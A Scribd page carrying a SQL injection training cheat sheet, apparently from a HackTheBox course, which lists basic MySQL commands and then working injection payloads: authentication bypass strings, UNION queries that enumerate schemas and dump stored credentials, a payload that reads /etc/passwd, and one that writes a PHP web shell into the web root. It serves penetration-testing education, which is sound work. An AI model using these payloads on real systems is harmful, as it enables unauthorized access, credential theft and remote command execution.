Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd
Upload
21 views

SQL Injection Fundamentals Module Cheat Sheet

This document provides a cheat sheet for SQL injection fundamentals and common MySQL commands and payloads. It covers topics such as logging into MySQL, managing databases and tables, inserting and updating data, sorting and filtering query results, fingerprinting the database, exploiting lack of input validation to perform authorization bypass and data extraction, and using file system access for further system compromise. The cheat sheet acts as a quick reference guide for assessing a system's exposure to and defense against SQL injection attacks.

Uploaded by

Lucas Luque
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
21 views

SQL Injection Fundamentals Module Cheat Sheet

This document provides a cheat sheet for SQL injection fundamentals and common MySQL commands and payloads. It covers topics such as logging into MySQL, managing databases and tables, inserting and updating data, sorting and filtering query results, fingerprinting the database, exploiting lack of input validation to perform authorization bypass and data extraction, and using file system access for further system compromise. The cheat sheet acts as a quick reference guide for assessing a system's exposure to and defense against SQL injection attacks.

Uploaded by

Lucas Luque
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

SQL INJECTION FUNDAMENTALS

CHEAT SHEET
MySQL

Command Description

General

mysql -u root -h docker.hackthebox.eu -P login to mysql database


3306 -p

SHOW DATABASES List available databases

USE users Switch to database

Tables

CREATE TABLE logins (id INT, ...) Add a new table

SHOW TABLES List available tables in current


database

DESCRIBE logins Show table properties and columns

INSERT INTO table_name VALUES (value_1,..) Add values to table

INSERT INTO table_name(column2, ...) VALUES Add values to specific columns in a


(column2_value, ..) table

UPDATE table_name SET column1=newvalue1, Update table values


... WHERE <condition>

Columns
Command Description

SELECT * FROM table_name Show all columns in a table

SELECT column1, column2 FROM table_name Show specific columns in a table

DROP TABLE logins Delete a table

ALTER TABLE logins ADD newColumn INT Add new column

ALTER TABLE logins RENAME COLUMN newColumn Rename column


TO oldColumn

ALTER TABLE logins MODIFY oldColumn DATE Change column datatype

ALTER TABLE logins DROP oldColumn Delete column

Output

SELECT * FROM logins ORDER BY column_1 Sort by column

SELECT * FROM logins ORDER BY column_1 DESC Sort by column in descending order

SELECT * FROM logins ORDER BY column_1 Sort by two-columns


DESC, id ASC

SELECT * FROM logins LIMIT 2 Only show first two results

SELECT * FROM logins LIMIT 1, 2 Only show first two results starting
from index 2

SELECT * FROM table_name WHERE <condition> List results that meet a condition

SELECT * FROM logins WHERE username LIKE List results where the name is
'admin%' similar to a given string

MySQL Operator Precedence


Division (/), Multiplication (*), and Modulus (%)
Addition (+) and Subtraction (-)
Comparison (=, >, <, <=, >=, !=, LIKE)
NOT (!)
AND (&&)
OR (||)

SQL Injection

Payload Description

Auth Bypass

admin' or '1'='1 Basic Auth Bypass

admin')-- - Basic Auth Bypass


With comments

Auth Bypass Payloads

Union Injection

' order by 1-- - Detect number of


columns using order
by

cn' UNION select 1,2,3-- - Detect number of


columns using Union
injection

cn' UNION select 1,@@version,3,4-- - Basic Union injection

UNION select username, 2, 3, 4 from passwords-- - Union injection for 4


columns

DB Enumeration

SELECT @@version Fingerprint MySQL


with query output

SELECT SLEEP(5) Fingerprint MySQL


with no output

cn' UNION select 1,database(),2,3-- - Current database


name

cn' UNION select 1,schema_name,3,4 from List all databases


INFORMATION_SCHEMA.SCHEMATA-- -
Payload Description

cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from List all tables in a


INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - specific database

cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA List all columns in a


from INFORMATION_SCHEMA.COLUMNS where specific table
table_name='credentials'-- -

cn' UNION select 1, username, password, 4 from Dump data from a


dev.credentials-- - table in another
database

Privileges

cn' UNION SELECT 1, user(), 3, 4-- - Find current user

cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user Find if user has


WHERE user="root"-- - admin privileges

cn' UNION SELECT 1, grantee, privilege_type, Find if all user


is_grantable FROM information_schema.user_privileges privileges
WHERE grantee="'root'@'localhost'"-- -

cn' UNION SELECT 1, variable_name, variable_value, 4 Find which directories


FROM information_schema.global_variables where can be accessed
variable_name="secure_file_priv"-- -
through MySQL

File Injection

cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- - Read local file

select 'file written successfully!' into outfile Write a string to a


'/var/www/html/proof.txt' local file

cn' union select "",'<?php system($_REQUEST[0]); ?>', Write a web shell into
"", "" into outfile '/var/www/html/shell.php'-- - the base web
directory

You might also like